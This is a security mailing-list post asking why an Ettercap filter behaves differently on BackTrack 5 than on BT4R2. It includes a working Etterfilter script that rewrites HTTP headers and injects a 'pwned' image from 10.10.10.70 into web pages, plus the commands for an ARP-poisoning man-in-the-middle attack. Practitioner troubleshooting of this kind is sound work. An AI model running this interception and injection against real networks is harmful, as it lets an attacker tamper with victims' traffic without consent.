Ettercap + Etterfilter weirdness on BT5

[Joshua Wright <jwright () hasborg com>]

Has anyone successfully used Ettercap with a filter on BT5?

On BT4R2, this script works like a champ:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "If-Modified-Since")) {
      replace("Accept-Encoding", "If-PACified-Since");
      msg("Killed If-Modified-Since\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://10.10.10.70/pwned.jpg\"; ");
   msg("pwned image injected\n");
}

# etterfilter -o pwned.ef pwned.filter
# ettercap -TqM arp:remote -F pwned.ef // //

In testing with BT5 however, I see the logging messages, and the packets
are injected by Ettercap, but the original frames are not dropped.  I
validated this on the victim where he gets the original packets
immediately followed by the Ettercap-modified packets.  The follow-up
packets are dropped by the victim as TCP retransmissions.

I confirmed this behavior on BT5 VM and booting from a DVD natively.

I'm guessing this is due to something having changed in the kernel from
BT4R2 to BT5, but I'm not sure what it could be.  I checked
/sys/net/ipv4/ip_forward, but it is set to 0.  Any other suggestions?

Thanks,

-Josh
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com